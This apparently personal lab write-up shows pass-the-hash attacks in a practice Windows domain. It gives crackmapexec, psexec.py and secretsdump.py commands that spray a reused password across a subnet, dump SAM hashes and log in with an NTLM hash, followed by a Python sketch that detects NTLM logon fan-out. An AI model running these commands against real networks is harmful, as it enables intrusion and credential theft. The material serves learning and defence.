# Pass The Hash

I used a tool called crackmapexec to check for password reuse on other machines in the same domain:

`crackmapexec smb 192.168.64.0/24 -u fcastle -d MARVEL.local -p Password1`

`crackmapexec smb 192.168.64.0/24 -u fcastle -d MARVEL.local -p Password1 --sam`

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FmrxOsT4q64wWMSwjeFzj%2Fimage.png?alt=media&#x26;token=b8993c11-3c95-4d43-a278-1f58d544ca24" alt=""><figcaption></figcaption></figure></div>

Once I had the names of the computers I could log in to, I used a tool called psexec to log in to those computers: `psexec.py marvel/fcastle:Password1@192.168.64.153`

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FrCz3SRw81n6zyz7k7ZgK%2Fimage.png?alt=media&#x26;token=2808e0c9-be42-4545-896f-9e45050d1b46" alt=""><figcaption></figcaption></figure></div>

I also used a tool called secretsdump.py to dump the hashes: `secretsdump.py marvel/fcastle:Password1@192.168.64.153`

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FhlJu71GLHu0QyTbywdyM%2Fimage.png?alt=media&#x26;token=5a04d75b-8973-498d-adfb-a9b2a083c8f0" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2Fhh2bchJMY5IGEqw0K147%2Fimage.png?alt=media&#x26;token=c3eb9f9f-0e25-414c-8efb-25fcaaacb3d0" alt=""><figcaption></figcaption></figure></div>

NTLM hashes can be passed. NTLMv2 hashes cannot be passed. These are SAM database hashes. We can then crack these hashes using hashcat.

I can also check whether the hash is used on other machines in the same domain: `crackmapexec smb 192.168.64.0/24 -u "Frank Castle" -H 64f12cddaa88057e06a81b54e73b949b --local-auth`

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FZdnGnbViIgzMeYBUA7hF%2Fimage.png?alt=media&#x26;token=df460631-06dd-4e1c-8674-42605b819adb" alt=""><figcaption></figcaption></figure></div>

We can also use a hash with the psexec tool: `psexec.py "frank castle":@192.168.64.153 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b`

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FVWMauF6Ue8GK8ab8Hgz1%2Fimage.png?alt=media&#x26;token=c948bed3-a091-40b5-85a4-33ed4a64b6a2" alt=""><figcaption></figcaption></figure></div>
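On the defending side, the subnet-wide checks above appear in Windows Security logs as one source address making NTLM network logons (event 4624, logon type 3) with the same account on many hosts within seconds, whether a password or a hash was supplied. The following detection sketch is an added example, not part of the original notes; the field names follow event 4624, while the host names, addresses, timestamps and the `ev` and `find_ntlm_fanout` helpers are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, computer, user, ip, pkg="NTLM", logon_type=3):
    """Build one flattened 4624 record (constructed sample data)."""
    return {"EventID": 4624, "TimeCreated": datetime.fromisoformat(ts),
            "Computer": computer, "TargetUserName": user, "IpAddress": ip,
            "AuthenticationPackageName": pkg, "LogonType": logon_type}

# Constructed events: one source fans out to three hosts in seconds;
# another account logs on to two hosts hours apart, once via Kerberos.
SAMPLE = [
    ev("2024-01-01T10:00:01", "WS01", "fcastle", "10.0.0.5"),
    ev("2024-01-01T10:00:02", "WS02", "fcastle", "10.0.0.5"),
    ev("2024-01-01T10:00:03", "WS03", "fcastle", "10.0.0.5"),
    ev("2024-01-01T10:00:04", "WS01", "pparker", "10.0.0.9", pkg="Kerberos"),
    ev("2024-01-01T10:00:05", "WS02", "pparker", "10.0.0.9"),
    ev("2024-01-01T12:30:00", "WS03", "pparker", "10.0.0.9"),
]

def find_ntlm_fanout(events, min_hosts=3, window=timedelta(minutes=5)):
    """Return [(source_ip, account, [hosts])] where one source/account pair made
    NTLM network logons to at least min_hosts distinct hosts within `window`."""
    logons = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4624 and e["LogonType"] == 3
                and e["AuthenticationPackageName"] == "NTLM"
                and not e["TargetUserName"].endswith("$")):  # skip machine accounts
            key = (e["IpAddress"], e["TargetUserName"].lower())
            logons[key].append((e["TimeCreated"], e["Computer"]))
    findings = []
    for (ip, user), hits in logons.items():
        hits.sort()
        start, best = 0, set()
        for end, (ts, _) in enumerate(hits):
            while ts - hits[start][0] > window:  # slide the window forward
                start += 1
            hosts = {h for _, h in hits[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            findings.append((ip, user, sorted(best)))
    return sorted(findings)

if __name__ == "__main__":
    for ip, user, hosts in find_ntlm_fanout(SAMPLE):
        print(f"{ip} -> {user}: NTLM network logons to {len(hosts)} hosts {hosts}")
```

The thresholds are starting points; management servers and vulnerability scanners produce the same fan-out and need an allowlist keyed on source address.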
